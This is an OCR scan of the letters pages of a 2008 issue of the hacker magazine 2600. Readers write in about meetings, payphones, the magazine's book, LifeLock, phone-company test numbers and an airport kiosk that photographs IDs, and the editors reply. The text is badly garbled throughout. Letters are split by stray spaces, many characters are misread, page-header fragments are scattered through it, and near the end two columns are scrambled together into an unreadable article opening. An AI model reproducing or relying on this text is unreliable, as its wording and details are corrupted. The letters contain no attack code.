for your websi te? There are many i nteresti ng pay
phones in Tai wan now, but they have evol ved i nto
somethi ng more l i ke ki osk computers wi th touch
screens. I can send some photos to you i f you woul d
l i ke t o see them.
Tommy
By all means send them in. The address is
payphones@2600. com. Be sure to use the highest
quality settings on your camera as low settings don't
print well in the magazine.
Dear 2600:
Fi rst off, I real l y appreci ate the hard work you
guys put i nto produci ng such a great publ i cati on.
I t' s changed my percepti on of technol ogy greatl y. A
fri end and I have been i nspi red to start a 2600 meet
i ng in our l ocal area ( Bel fast, Northern I rel and) and
we were wonderi ng i f there i s any part i cul ar format
that these meeti ngs need to have?
redtape
It' all pretty straightforward. The meetings
need to be open to all in a public area with no
admission charge, age restriction, or anything
like that. There' a more detailed set of guidelines
on our website at www. 2600. comlmeetings. lt.
also important to keep us updated by emailing
meetings@2600. com so we know you're continuing
to run the meetings. Good luck!
Dear 2600:
Is there any part i cul ar reason you repl i ed to me
wi th a gi ganti c emai l of stuff I di dn't need to know?
Do you get many questi ons to meeti ngs@2600. com?
Because as I must contact you about the meeti ngs i n
Tul sa, I ' m not exactl y served by thi s.
Di d I do somethi ng wrong?
Joseph
You didn't do anything wrong but that ' the way
the system operates. Most people who email that ad
dress are looking for information on the meetings so
we have our robot automatically send a full list back
plus the set of meeting guidelines. Some people enter
into a dialogue with what they assume is a really fast
typing human. But you only get that big mail the first
time you send email to the address (and after a cer
tain number of weeks beyond that) . The alterative
to this system would be to have yet another email
address for those people reporting on meetings. That
would lead t o a lot more work and traffic than simply
deleting that one piece of mail we send.
Dear 2600:
I am tryi ng to expand the l i nks page on my web
si te www.bayareaki cks. com. and I woul d l i ke to add
your websi te (www. 2600. com/phones) to that l i st.
Some websi tes do not l i ke when others l i nk to them,
so I woul d l i ke to recei ve permi ssi on from you fi rst.
The thousands of dai l y vi ewers that read my
websi te are I nternet savvy and are al ways l ooki ng for
new websi tes to vi si t. I fi gured you woul dn't mi nd if
I l i nk to your si te si nce i t woul d gi ve you sl i ghtl y i n
creased traffi c. Does t hi s sound OK t o you? Are you
abl e to l i nk to my websi te? I l ook forward to your
repl y.
Mike
We don't do links ourselves but we certainly don't
mind anyone linking to us however they please. And
even if we did mind, we don't believe we would have
any right to object. It' amazing that so many people
live by rules that basically make no sense.
Dear 2600:
I wri te fol l owi ng fi ndi ng your si te on the web af
ter many years of bei ng very busy wi th an IT career
and maki ng stupi d mi stakes such as getti ng i nvol ved
wi th rel ati onshi ps. I became aware of 2600 many
years ago but never real l y got i nto practi cal thi ngs. I
noti ced that there is a meeti ng in Gl asgow, Scotl and.
Can you gi ve me any more i nformati on regardi ng
t hi s or i ndeed i f i t sti l l happens. I l ook forward to
your response.
Liam/M/37
The only way to know if it' still happening is
to go there and see. Even if nobody else shows up,
there' nothing stopping you from breathing new life
into it. But we appreciate being told if the meetings
die out so we don't have to squish so many of them
onto page 66. Lately it seems as if everyone is com
plaining about the tiny type.
Dear 2600:
2600 is the best magazi ne ever, but the ti ny type
is ki l l i ng me as my eyes are gett i ng worse and worse
every year. Have you ever thought of havi ng an emai l
versi on of the magazi ne that peopl e coul d subscri be
to? I woul d l ove to get my 2600s as a PDF, DOC, or
maybe j ust a pl ai n ol d text fi l e. One thi ng i t woul d
save i s me havi ng t o type i n t he programs. I coul d
j ust copy and paste i nstead. I n t he meanti me, keep
up the great work and I ' l l j ust buy a more powerful
magni fyi ng gl ass.
SAR
We now put all of the code up on our website
so you don't have to retype any of it. Were always
looking for new and innovative ways of doing things.
The latest is our 900 page book of some of our best
articles which is just hitting the shelves with much
larger type.
Summer 200B Pg
e
3
5
Dear 2600:
How can I use the servi ces of a hacker?
etsjobs
Whereas most religions require you to pray or do
some sort of penance in order to obtain the goods
and services you desire, with hackers you have but to
ask and pay our nominal fee. Obtain any password,
change any grade, even travel back in time when
necessary! Your wish (plus the fee) is our command.
Now go tell all your friends.
Dear 2600:
I woul d l i ke to get your new book cal l ed The Best
of 2600: A Hacker Odyssey when your book comes
out in J ul y 2008. Where can I buy your new book?
And what does your new book cover? Can you send
me some pri ntout of the Tabl e of Contents of your
book cal l ed The Best of 2600: A Hacker Odyssey?
And what wi l l your new book cost? Al so, can we buy
thi s book from you? Woul d you pl ease send me any
i nfo you have about your new book? I wi l l be l ook
i ng forward to hear i ng from you. And to getti ng your
new book.
John
We believe you're referring to our new book. It'
available everywhere, both online and in bookstores.
It retails for $39. 99 and covers the three decades that
2600 has been around. We don't sell i t ourselves as
i t ' sold directly through the publisher (Wiley) . We're
real happy we could finally pull this off and get so
much of the historical material we've published since
1 984 out into the mainstream. Let's hope it does well
so we can do more fun projects like this.
Dear 2600:
Urgent! I need a new i denti ty for me and my
daughter because we are vi cti ms of abuse i l l egal l y.
Send me i nformati on pl ease.
Eva
00 you really believe that emailing total strang
ers is the best way to start a new life? We're not the
witness relocation people but even if we were, it'
not the kind of thing you do casually You can find a
whole lot of tips on the net about how to hide and/
or protect your privacy. Advertising your problems to
anyone who will listen is probably the first item on
the list of things not to do.
Dear 2600:
I have thi s stupi d "ShopAtHome Sel ectRebates"
th i ngi e in my tool bar that refuses to be del eted. How
do I get rid of the program In Toto? I mean, I went
i nto the "Program Fi l es" and del eted al l that I coul d,
but there were some thi ngs that refused to be de
l eted. What gi ves?
Z
You need a decent malware/adware/general crap
removal program that isn't worse than the stuff it'
supposed to be getting rid of. We're not going to rec
ommend one over another because it'll just start end
less bickering that none of us will live to see the end
of. Look at the platform you have and find some pro
grams that will run in your environment, then look
for user reviews of their performance before actually
installing them. And in the future, be careful of what
you download or open on your system as this is how
Dear 2600:
I found your j ournal in a Borders, bought it
qui ckl y, and was pl easantl y surpri sed. I t's provi ded a
useful resource to the di gi tal i mage research I do that
I 'd prefer not to say anythi ng el se about. I do have
a questi on for you and your 2600 readers: I s there
a method for fi ndi ng and restori ng metadata that's
been purposel y erased from di gi tal i mages? Thi s i n
formati on coul d be qui te, qui te useful . Keep up the
good work.
Haestar
This sounds like material for a really informative
article if someone out there has done the research.
Dear 2600:
I have put together an arti cl e that I woul d l i ke to
submi t to 2600 for your consi derati on. Do you have
an edi tori al cal endar and gui del i nes avai l abl e or can
I j ust submi t the arti cl e? Can I i ncl ude exhi bi ts? Do
you prefer a Word document or PDF fi l es? Pl ease l et
me know.
R
just send us what you've got. We can read most
anything but to be safe always send along a plain
ASCII text fle. The email address is articles@2600.
com.
Dear 2600:
l et me in . . . so what do i have to do to get i n? i m
tradi ng code t o t hi s guy for ni ce computers. usenet
woul d ni ce. it woul d be ni ce. im goi ng to have a
mi ndset wi th nuemoni c reach and a storage parti
ti on of a 1 00 gb wi th terrar process. but i dont have
any other
Phobus
No, you certainly don't.
Dear 2600:
Do you fol ks accept press rel eases? We recentl y
announced a new software product that we thi nk i s
real l y ti mel y: an easy t o use drive mi grati on uti l i ty.
Can we send you our press rel ease or a copy of the
software to revi ew?
Woul d much appreci ate a repl y.
Donna
We accept all kinds of crap from people and we
suspect a bunch of press releases would fit that def
nition. But we' rather not have to wade through a
pile of public relations nonsense in order to get to
the words of our readers, which is what the email ad
dress (/etters@2600. com) you contacted is set up for.
Oh yes, and we also don't send out personal replies.
But you knew that.
Dear 2600:
Best greets from Austri a. It's real l y hard to get a
copy of 2600 here, but congratul ati ons to your great
magazi ne.
A fri end of mi ne and I have wri tten an arti cl e
about t he basi cs of t he l ockpi cki ng sport. The arti cl e
contai ns an i ntroducti on to the sport i n general , a
short expl anati on of the l i nk between hacki ng and
l ockpi cki ng and the basi c techni ques l i ke pi cki ng and
bumpi ng. I mpressi oni ng i s not covered i n the arti cl e.
Are you i nterested i n t hi s ki nd of arti cl e? Do you
al so shi p magazi nes to Austri a? Do you have a part
ner here?
such garbJ e gets there in the first place.
Tom
pg
e
6 2600 Ma
g
azine
We have many partners in crime in Austria, but so
far no partners in magazine distribution. Your best bet
is just to get a subscription and have it mailed to you
directly from us. And of course we'd be interested in
seeing your article.
Dear 2600:
Tel l me how much one of your hackers woul d
charge me t o del ete my cr i mi nal record from the
Texas pol i ce database.
[Name Deleted]
Well, we would start with erasing your latest
crime, that of soliciting a minor to commit another
crime. (Your request was read by a small child here
in the office. ) After you're all paid up on that, we will
send out the bill for hiding your identity by not print
ing your real name, which you sent us like the meat
head you apparently are. After that' all sorted, we
can assemble our team of hackers, who sit around
the office waiting for such lucrative opportunities as
this to come along, and figure out even more ways
to shake you down. It's what we do, after all. Just ask
Fox News.
Dear 2600:
I have a lot of hacki ng rel ated pi cs on my phone
and I was wonder i ng how I shoul d get them to you i n
a usabl e format si nce I do not have anyth i ng that wi l l
hook up t o my computer t o get the pi ctures off of the
phone any advi ce wou l d be very hel pfu l .
eri k
It seems odd that you have a picture phone with
no means of sharing pictures. If you can use email
on your phone, you could always email them to us.
If that doesn't work, you'' just going to have to send
us the phone. (And don 't forget the charger. )
Dear 2600:
Here I am pl owi ng through a shameful backl og
of one year's worth of 2600. Wh i l st tak i ng a break, i t
occurred to me to i nvesti gate how much I 've spent on
2600 si nce I started purchasi ng at the newsstand i n
1 995. I have a col l ecti on of about 44 i ssues wi th an
approxi mate average pri ce of $5. 65. I 've spent about
$250 on 2600 over the years. So, I ' m ki cki ng mysel f
for not consi deri ng a l i fet i me subscri pti on sooner.
Do you guys thi n k you' l l be abl e to keep on trucki ng
at l east another t en years so I coul d get more bang for
my buck upon order i ng a l i fet i me subscri pt i on?
Al so, are l i fet i me subscri pti ons transferabl e or
does i t absol utel y end wi th me? Let's say, for exam
pl e, one of my chi l dren takes a l i ki ng to your maga
zi ne and I become a pcnn i l css wi dower stri cken wi th
gl aucoma. Can my chi l d then carry the mant l e of
2600 reader of the fami l y on my $260?
Asi de: does 2600 have a game pl an i f one or
more of the cri ti cal staff i s met wi th i nj ury or death
that prevents them from worki ng on the magazi ne?
Have you tapped anyone to take over the rei ns i f the
I i fe of the magazi ne outl asts those of cr i t i cal staff
members?
I apol ogi ze for my questi ons spi ra l i ng towards
the morbi d. I 'm at that age where l i fe and death seem
to be occur r i ng i n equal quanti ti es.
Acidevil
Well, thanks for depressing the hell out of all of
us. Clearly we need to start thinking about how to
incorporate death into our business plan. We'll try
to get on it. But first we need to get through The Last
HOPE.
Lifetime subscriptions really are intended for your
(or our) lifetime. When one of those ends, the sub
scription ends. It' not meant to last for the lifetime of
the human race, as you are apparently already plot
ting to do through your future unborn generations.
If this kind of abuse prevails, we might have to cap
these subscriptions at 1 20 years or however long
people are living to these days.
We'll make every attempt to live long enough to
ensure that you get your money's worth from your
lifetime subscription. This is the solemn promise we
make to all of our readers.
Dear 2600:
I subscri bed in December of 2007 and have onl y
recei ved t he fi rst quarter mag. Has t he second quar
ter gone out yet?
chris
Yes, and you really should have gotten it. Please
let us know if you see this.
Dear 2600:
I 'd l i ke to publ i sh two arti cl es, can I meet a staff
member?
Musique Maison
Not so fast there. You don't get a personal visit
until you publish 20 articles! Nice try though.
Dear 2600:
What do you thi nk about Li feLock? Seems to me
that j ust some common sense protect i on of your per
sonal i nformat i on is enough. The adverts seem a l i tt l e
extreme, wi t h the guy shar i ng hi s SSN and a l l .
eroOcool
You're refrring to the company whose CEO goes
around advertising his Social Security number saying
that he has nothing to worry about because he uses
the service he' peddling to protect his identity. All
this tells us is that the availability of SSNs has got
ten so common that it' almost a trivial detail at this
point. W're expected to give them to the phone
company, employers, banks, schools, and virtually
anyone who asks for them. Since so many people still
don't know how to say no, a whole business based
on fear has popped up under the guise of protecting
you from exploitation. You really don't need a com
pany to do this. As you say, a little common sense
goes a long way. Keep your private information to
yourself, don't advertise anything about your private
life on the Interet that you wouldn't want Charles
Manson to know about, and keep a close eye out for
any electronic transactions that may not be yours.
Like any disease, prevention and early treatment will
go a long way.
Observations
Dear 2600:
Fi rst off I need to apol ogi ze i f my Engl i sh seems a
bi t wei rd. I speak German as my nat ive l anguage and
I am not 1 00 percent bi l i ngual . Recent l y I enj oyed a
l augh whi l e tryi ng to cal l a fri end of mi ne who l i ves
in New York ci ty. I di al ed 7 1 8-238-9901 by acci dent
(fri end's number i s actual l y a coupl e of di gi ts off) and
recei ved the recorded "stati on 1 0" for the 77th Street
Summer 2008 Pa
g
e
37
DMS- l 00. If rock and rol l fans who cal l t hi s number
t hi nk "The Ki ng" i s dead, turns out he's been worki ng
for Veri zon t hi s whol e t i me.
Anyhow, I have been readi ng 2600 for at l east
a coupl e of years now and am enj oyi ng what I am
readi ng. I rea l l y fi nd i t i nteresti ng especi al l y wi th
regard to the tel ephone arti cl es. I get a ki ck out of
cal l i ng some of the odd tel ephone numbers sent i n
occasi onal l y by readers and I even bought a Track
Phone not too l ong ago j ust for phone expl orati on
of thi s type.
Ri de tuff and al ways have your Track Phone
handy. Thankya ver' much.
fOxR4c3r
That recording has been around forever, well be
fore Verizon even existed. In the New York area, the
990 1 suffix is often used to identify the switch type
of a particular exchange. It used to be that dialing
anything in the 99xx series would hook you up to
something being run by the phone company 9970
would always get you a busy signal, 997 1 a fast busy
(reorder), 9979 a sweep tone, and 9950 oftentimes
would connect you to the business office. These days
you could easily wake up a customer in the middle
of the night if you try any of these numbers as they're
now being used as non-magical extensions.
Dear 2600:
Yesterday I was pass i ng t hrough Veni ce ai rport
and attempted to use an I nternet poi nt. Thi s I nternet
termi nal i nterested me as i t was a free standi ng ki osk
wi th the opti on to open fi l es from a pen dri ve. So I
i nserted mi ne so I coul d open my expl oi t - I mean
photos - from my pen dri ve. Next t hi ng I was be
i ng prompted that I must have my passport snapped
by the ki os k's webcam before I can access the ma
chi ne . . . somethi ng about the I ta l i an government
requi ri ng i t. Of course I di dn't offer i t anythi ng and
after a few moments the machi ne prompted for an
other photo t o be taken. So I di dn't agree t o have my
I D photographed and pushed the refund button, but
nothi ng happened. Thi s has t o be agai nst some l aw;
there was no i ndi cati on unt i l I i nserted my money
that my I D wou l d have to be recorded, and when I
di dn't agree to these terms, I was not gi ven the op
ti on of a refund. The ki osk's owners j ust made a qui ck
buck from me wi t h absol utel y no retur n. Does any
one know i f thi s i s normal practi ce or does i t happen
i n any other countri es? 2600 readers, beware of such
termi nal s .
Pdraig
We doubt such d thing would be tolerated for
very long over here, unless people were told it was
needed for homeland security or something. And
what are the odds of that? But it would be helpful to
expose the name of the company running this kiosk
and stirring up some outrage about these practices.
That ' the very definition of civic duty
Dear 2600:
J ust recentl y I 've been i ntervi ewi ng for j obs in my
area and noti ced a few t hi ngs. One i s that i t seems
l i ke a l l sen i or network engi neers l i ke to brag about
thei r networks, whi ch coul d make for an outstandi ng
soci al engi neeri ng experi ment. For exampl e, I i nter
vi ewed wi th a u ni versi ty in my area and the guy went
real l y i n depth wi th what they use and/or pl an on
usi ng. I woul d t hi nk these peopl e woul d onl y di vul ge
i nformati on that i s necessary to gai n an understand
i ng of what the appl i cant ski l l s are. The second t hi ng
i s t hat i f you are tryi ng t o get i nto an i nformati on as
surance career, good l uck. You won't even get some
one to tal k to you unl ess you have taken and passed
the C1 SSP. I don't understand how t hi s makes you any
more knowl edgeabl e. I 've worked wi th a few peopl e
who have had t hi s cert and al l they di d was cram
for i t weeks i n advance to pass. After taki ng i t, they
dumped a l l the i nformati on that they l earned. Maybe
you coul d shed some l i ght on how t hi s cert became
so popul ar.
tim
It' really not much more than the power of sug
gestion.
Dear 2600:
I ' m not sure where to submi t my take on the
cover submi ssi on (24: 4) but I hope i t gets to the ri ght
pl ace.
My take i s that the sayi ng i s "Abandon Hope al l
ye who enter here. " Whi ch i s t he i nscri pti on above
the gates of hel l . Basi cal l y, the date and the sky and
statues above the entrance are sayi ng t hi s to me.
Abandon Hope, for thi s i s the end of the Hotel Penn
syl vani a. And that thi s i s trul y the l ast ti me we wi l l
be getti ng together here. I t's t he apocal ypse for the
hotel . My cl ues came from the "make reservati ons
to attend" on page 64, and of course Googl e for the
other i nformati on.
I f I ' m wrong or on the ri ght track, pl ease l et me
know.
CJ Lorenz
We will.
Dear 2600:
I ' m wri t i ng you concern i ng my cel l phone ser
vi ce wi th T-Mobi l e. Over a year and a hal f ago I no
ti ced that I was abl e to hear the person cal l i ng before
h i tti ng the answer button. My phone is al ways on
vi brate, and I can hear the person speaki ng qui te
cl ear l y. I 've showed thi s i nterest i ng probl em to sev
eral fri ends, so I know i t i sn't in my head.
Si x months ago I bought a new phone, and be
fore bei ng abl e to purchase i t, the T-Mobi l e worker
had to mess wi th my account i nformati on on t hei r
computer. Needl ess t o say, wi thi n mi nutes of wal k i ng
out of the store I was experi enci ng the same prob
l em.
I have si nce swi tched back t o my oi d phone, and
i t no l onger happens. I don' t have a hi story of mental
i l l ness, nor do I tend to be overl y paranoi d. Obvi
ousl y i t wou l d be very easy t o experi ence a l ot of
paranoi a in t hi s si tuati on but I 've been doi ng my best
to stay grounded and l ogi cal .
I 've asked several peopl e a n d even cal l ed T
Mobi l e about t hi s i ssue. They a l l have sai d the same
thi ng: i t's not possi bl e. Surel y i t i s or otherwi se I
wou l dn't be wri t i ng t hi s l etter. I was hopi ng the
2600 staff or l oyal readers mi ght have some words of
knowl edge for me.
rmpants
This isn't the first time we've heard people swear
this has happened to them. We've also heard people
say they can hear the called party before they an
swer. In your case though, we're curious as to what
Pa
g
e 3
8
2600 Ma
g
azine
you believe the risk is to you if you can hear people
speaking before you answer their cal. Also, why ex
actly are they speaking before you pick up? We think
you should use this opportunity to run all sorts of
experiments.
Dear 2600:
I was l i steni ng a whi l e back to one of your Off
The Hook podcasts where you were di scussi ng stop
pi ng peopl e's snai l - ma i l by USPS over the I nternet
wi th no veri fi cat i on. Thought you mi ght l i ke t hi s.
I l i ve i n I rel and and recentl y I swi tched my mo
bi l e operator. I n I rel and al l the rage i s that you are
al l owed to keep your ol d phone number when you
swi tch. So thi s i s what I wanted. The l ady asked what
my oi d number was, so I tol d her. Si nce I was gett i ng
the pay-as-you-go pl an, I di d not have t o provi de my
r eal name or anythi ng, and the l ady even confi rmed
thi s for me when I asked about i t. At the end of the
process she t hanked me, and handed me the new
SI M card (whi ch cost ni ne euros and came prel oaded
wi th ten euros worth of credi t) . I asked i f that i s a l l .
S h e repl i ed that i t woul d take up t o 24 hours for the
phone number to change. ( i t actual l y took about fou r
hours. ) No veri fi cati on of a n y k i n d that I own t hi s
phone number! They even promi sed t o do al l the pa
perwork i n three mi nutes or you get 30 euros worth
of credi t. Note for North Ameri can readers: i n Eu
rope some banks offer the abi l i ty t o veri fy/approve
bank transact i ons ( l i ke purchases wi th your credi t
card, wi re transfers, etc. ) usi ng SMS/text i ng on your
mobi l e.
Si Ki ng
Dear 2600:
I j ust recei ved my new sweats hi rt . Thanks for the
very qui ck del i very. I t had the fol l owi ng effect on my
fami l y members:
1 ) wi fe - rol l ed her eyes and made some ki nd of
grunti ng sound.
2) son, age 1 2 - "Cool sweats hi rt Dad. Di d you
get me one?"
3 ) daughter, age 9 - "I s 2600 the pri ce?"
4) daughter, age 7 - "Mom farted. "
Bob
At least now we know what the grunting sound
was. Very similar conversations take place in all sorts
of households around the world when 2600 clothing
makes its entrance.
Dear 2600:
As someone who hates gett i ng ri pped off, I 've
di sabl ed text messagi ng on my AT&T account. Un
fortunatel y, t hi s means I can nei ther send nor recei ve
text messages, but fort unatel y i t al so means I ' m not
payi ng extra for somet hi ng that transmi ts an i nfi ni tes
i mal amount of data when compared to voi ce cal l s .
I found out recentl y t hat I can sti l l recei ve mul t i
medi a messages from my fri ends' phones. A message
is sent to my phone vi a AT&T whi ch di rects me to go
to a websi te to vi ew my mu l t i medi a message ( http: /
vi ewmymessage. com) . A username and a password
i s provi ded in the message to my phone, and I have
si x days to l ook at the message before it expi res. After
enteri ng the username and password, I was taken to
a page that di spl ayed the to, from, subj ect, date, and
s i ze of the message, al ong wi th my mul ti medi a mes
sage ( usua l l y an i mage) embedded i n fl ash.
I ' m pi ssed that they' l l offer me si x days to vi e
messages sent to me wi th no opti on for savi ng the
i nformati on! I ' m not too exper i enced wi th worki ng
around embedded f l ash, but I know i t can be done.
Another i nteresti ng t i dbi t, regardl ess of username
and password, after enteri ng you r i nfo a l l users are
redi rected to the fol l owi ng URL. http:/www. vi ew
mymessage. com/en/webnons ubs cr i ber/vi ewmes
sage. do. There was some i nterest i ng i nfo i n the page
source, but I was unabl e to use i t to find any i nfo
on exact l y where my i mage was ( nor to fi nd mul t i
medi a messages i ntended for ot her subscri bers) . J ust
thought I 'd share t hi s i nfo in hopes that someone out
there wi th the know-how wi l l expl ore i t more thor-
oughl y than thi s nOOb.
Nol i
Incidentally, we have a very interesting piece on
text messaging in this issue' "Telecom Informer" on
page 7 3.
Dear 2600:
After readi ng some of your most recent i ssues, I
noti ced the whi te boxes on your new spi nes (whi ch
j ust l ook awesome, for the record) and noti ced that
they seem to be formi ng l etters of some ki nd after
compar i ng the spi nes of two recent i ssues.
I t appears that they make some sort of word/
phrase when pl aced together in order, but I can onl y
extrapol ate from the 24: 4 and 24: 2 i ssues. So, what's
the "Secret Word" here? My best guess is " F UBARI F
I C" but I know that's not ri ght because I ' m more or
l ess guessi ng on the l ast three l etters.
Ji gsaw
We only got as far as four of the eight issues need
ed to make it complete (not in issue order, either) .
But two things happened that hastened the project'
demise. One was that the new binding sucked and
was causing our readers much distress. The other
was that some of our smart alecky readers had al
ready figured out the message a full year before it
was supposed to be finished. The secret word was
"Surprised?" We certainly were.
Dear 2600:
At the end of my arti cl e from 2 5 : 1 on Wi ki pedi a
i t states that the AfD on Ebony Anpu was overturned
by the "Del eti on Revi ew Admi ni strat i on Pge. " Thi s
i s i ncorrect. I cou l d not outmaneuver t he Admi n i stra
tor I cal l Jeffrey who l ocked the page so that i t coul d
never be recreated at al l wi t hout Admi ni strator sup
port (a strange acti on, to be sure) : http:/en. wi ki pedi a.
orglw/i ndex. php?ti tl e=Ebony_Anpu&acti on=edi t
As per Marti n Eberhard's excel l ent suggesti on
t o make a pl ug- i n cal l ed "Haystack" whi ch makes
search noi se, there i s currentl y a Fi refox pl ug- i n
cal l ed "Track-Me-Not" whi ch I enj oy and acts s i mi
l ar l y.
Barrett Brown
Dear 2600:
I sti l l cannot tel l whether the express i on of di s
appoi ntment over the newspaper and TV news ac
counts i n your documentary (Freedom Downtime)
is genui ne or is meant to be i roni c. I woul d have
thought that, by the mi d 90s, everyone al ready knew
that the " major" outl ets were provi di ng entertai n
ment i nstead of i nformati on.
Summer2008 g
e 39
I n case you have not r un across it al ready, I wi l l
recommend Davi d Si mon's stuff from t he March
200S i ssue of Esquire about hi s ti me at the Balti
more Sun. I t hel ps wi t h the perspecti ve. Of course,
he presented i t as entertai nment, too, so keep it i n
perspecti ve. The URL i s http://www. esqui re. com/
features/essay/davi d-si mon-030S
Other t han that, I l i ked your documentary. I
wi sh it had a better endi ng.
Peter Di Giovanni
Simon 's cynicism about the plight of newspapers
and the media at least led him to write and produce
"The Wire, " a project that finally made the invention
of television worthwhile.
Dear 2600:
I used to col l ect comi cs and was bored one ni ght
and thought " hey, why not read one of those ol d
comi c books you have l yi ng around? " So I di d. Thi s
comi c was Chost Rider 2099 ( i ssue number one,
publ i shed i n 1 994) , an odd futuri sti c versi on of the
ori gi nal comi c publ i shed ( and made i nto a movi e)
by Marvel . I was readi ng t hrough i t unt i l the mai n
character "zero" was speaki ng t o one of hi s cohorts
over a vi deo payphone. When he was report i ng
about the casual ti es of the fight he had j ust escapt,
he sai d " Phrack and 2600 are dead. Warewol f too,
maybe. " A coi nci dence? I th i nk not. Hopefu l l y the
wri ter of Chost Rider 2099 ( Len Kami ns ki ) wasn't
tryi ng to make a statement about Phrack and 2600,
but I thought you wou l d l i ke to know anyways.
lo$er
/, amazing the things you can find by reading
comics. We just hope Warcwolf is OK.
Dear 2600:
Fi rst, I wou l d l i ke to compl i ment you on the
change from a gl ued to a stapl ed bi ndi ng. I t's easi er
to fol d the mag i n hal f and read from edge to edge.
Second, I I ,:ok forward to my new i ssues of 2600
as the a rt i cl es are a l l very cool , i n parti cul ar " Hacker
Perspecti ve" and "Tel ecom I nformer. " I know some
users prefer more tech arti cl es and how-tos but one
can al ways Coogl e, newsgroup, and even read ba
si c stuff l i ke "Hackers for Dummi es" and even the
whol e "Steal thi s Computer Book . . . " seri es.
Lastl y, I enjoy the bl end of phi l osophy, pol i ti cs,
and technol ogy that you ach i eve and wanted you
to know that when you rai se your pri ces i n the ncar
future as I th i nk you must, I wi l l sti l l subscri be. The
mere $6. 25 an i ssue i s penni es when compared to
the wea l th I fi nd i n your mag. I t's the si ngl e most
val uabl e mag that I subscri be to and I have many,
Wired bei ng the worst pi ece of trash, but i t's free.
aurfal i en
Dear 2600:
I j ust fi ni s hed 24: 4 and thorough l y enj oyed i t.
got to t hi nki ng ( yes, most peopl e wou l d rather di e
t han thi n k - i t's so much l i ke work) and deci ded to
l et you fol ks know the v<l ue, enj oyment, and safety
I have recei ved from my readi ng of 2600.
As a phys i ci an I had been in pri vate practi ce
and am now semi - reti red. I managed our admi t
tedl y s mal l , fi ve computers wi th router, hub, etc. ,
network for the i ntegrati ve car e practi ce. Knowi ng
t hat the Wi ndows envi ronment was a maj or prob
l em and nearl y i mpossi bl e to secure, my consul tant
and I chose to use SuSE Li nux S. 2 (yes, a bi t ago)
for the pr i nci pal server, wi th Samba as the i nterface
s i nce we were requ i red to use Wi nBl ow$ XP Pro as
the cI i ent OS due to software i ssues.
Havi ng onl y Knoppi x as my i ntro to Li nux, the
fi rst year was a n i ghtmare of a l ear ni ng curve and
1 -2 am as day's end was common. The SuSE admi n
manual was as frequent an occupant of my desk a s
both 2600 a n d Linux Pro. By t h e second year the
admi n manual was mostl y on the shel f but 2600
rema i ned on the desk.
The move to 9. 2 was a bi t rocky but went okay
overa l l . The equ i pment was HP Pvi l i on 733 seri es.
Whi l e that wasn' t very remarkabl e, HP's pol i cy re
gardi ng t hei r hard dri ves was. I di dn't t hi nk much
about i t when we set up t he server as whol l y Li
nux by t he expedi ent of squi s hi ng Wi nBl ow$ i nto
a l i ttl e bi tty 24 GB parti t i on. Yes, i t sti l l ran but it
was essenti al l y out of my way. I set up my personal
machi ne as a dual boot wi t h Wi n ( 24GB)/Li nux
( 65GB) . I wou l d have di tched Wi n enti rel y but the
offi ce management and EMR was Wi n onl y now,
though ori gi nal l y wri tten for Li nux. I sti l l bl ess Sam
ba and Cups!
Now the oddness. I had <n occasi on that forced
me to Cl l HP for a hardware i ssue. The Ethernet
card mostl y di ed but Wi nBl ow$ saw it as good. I
di dn' t thi nk anyth i ng of answer i ng the tech's ques
t i on about the OS setup and that i t was dual boot
wi th Wi n essenti a l l y compacted. I was tol d that I
had voi d"d my warranty and got hung up on.
After several cal l s and good ol d Mar i ne Corps
stubbornness I spoke wi th a supervi sor that ex
pl ai ned that I had voi ded the hardware warranty by
removi ng the i nstal l ed OS. Then the fur fl ew! I fi
nal l y got a copy of the hardware warranty i n wr i t i ng
and sure enough you voi d i t i f you remove i t. I found
t hi s a parti cul ar l y di st ur bi ng tacti c by Wi ndows/HP.
So after goi ng round and rOLl nd, I fi na l l y convi nced
them that there was noth i ng that prevented me from
a dual boot setup so l ong as I di d not "remove" the
pre- i nsta l l ed OS ( XP-Pro) . Eventual l y the whol e i s
sue was bumped to a case manager who not onl y
was L i nux competent ( and not a l l owed t o address
Li nux i ssups) but understood that I had not voi ded
the warranty and even set up a remote connec
t i on to screenshot and veri fy i t to end the hassl es
downstream and attempts to voi d the warranty. As
it turned out he was a l so a 2600 reader though he
asked me not to repeat that to ot her HP fol k. I t was
t hr ough a 2600 art i cl e that I found a way to test the
e-card from the Li nux parti t i on and the Knoppi x as
wel l determi ni ng t hat the car d was i ndeed bad and
i t was eventual l y repl aced.
So i n cl osi ng, i t was through my usi ng 2600,
Linux Pro, and s i mi l ar peri odi cal s that I l earned
t hi ngs to hel p me protect and servi ce my network
and keep i t up and runni ng. Thank you very much
2600 staff and may the PTB never prevent your i n
formati on from reachi ng those who need i t . I woul d
appreci ate i t i f you woul d j ust us e Dr. C rather t han
my fu I I name. I do haY a few pati ents who are
computer l i terate.
Dr. C.
Pa
g
e 40 2600 Ma
g
azine
Critique
Dear 2600:
In Forensi cs Fear ( 24: 4) , Anonymous Chi -Town
Hacker wri tes a pretty poi ntl ess art i cl e fi l l ed wi th ob
vi ous errors and maki ng vague references to sti r up
some random fear. I j ust wanted to poi nt out a few so
that others woul d see that he's ful l of #@*%. Fi rst, he
starts off wi th cl ai mi ng there's new software that runs
your system and gi ves a process name ( al though
I t can be changed, he cl ai ms) and then goes on to
say that i t runs underneath the as and i s OS- i nde
p
`
us d u ri ng t he show at + 1 2 1 2 209 2900.
Emai l oth @2600 . com wi th you r comments .
Pa
g
e 55
WiY IS
-
ilS
f
M'I
-
1
f-
P -f -l
I /
-?
by Porter Pyne
ment PCs, and anti vi rus management servers.
Of course, si nce I T managers have l ower
I was l i sten i ng to a recent edi t i on of 2600' s
eth i cs t han the average th i rd-wor l d di ctator, we
weekl y audi o program Of The Hook, and I
must al so be abl e to mon i tor the usage of each
heard the host, Emmanuel Gol dstei n, aski ng the
pc, i ncl udi ng any web brows i ng that mi ght be
quest i on, "Why does th i s computer need to be
done from that Pc. The fact that mon i tor i ng
connected t o the i nternet?"
an empl oyee' s web browsi ng i s tantamount to
Ah. An excel l ent questi on, and one that i s
menta l rape i s not an i ssue. I n the Uni ted States
more compl i cated and convol uted t han one
and some other countri es, anyth i ng done on
mi ght th i n k at fi rst.
busi ness computers i s subj ect to mon i tor i ng by
I used to work at an unnamed el ectri ca l
the IT department. You have no r i ghts to pri vacy
uti l i ty. Much of my experi ence comes from t hat
on wor k computers, peri od. Whet her t hi s i s ri ght
and from previ ous work experi ence as a network
or wrong i s i mmater i al ; i t i s the l aw.
admi ni strator and engi neer.
Because of a l l t hi s, computers that have no
So, why are computers that seemi ngl y have
busi ness bei ng on I nternet-con nected networks
no need for i nternet access connected to the
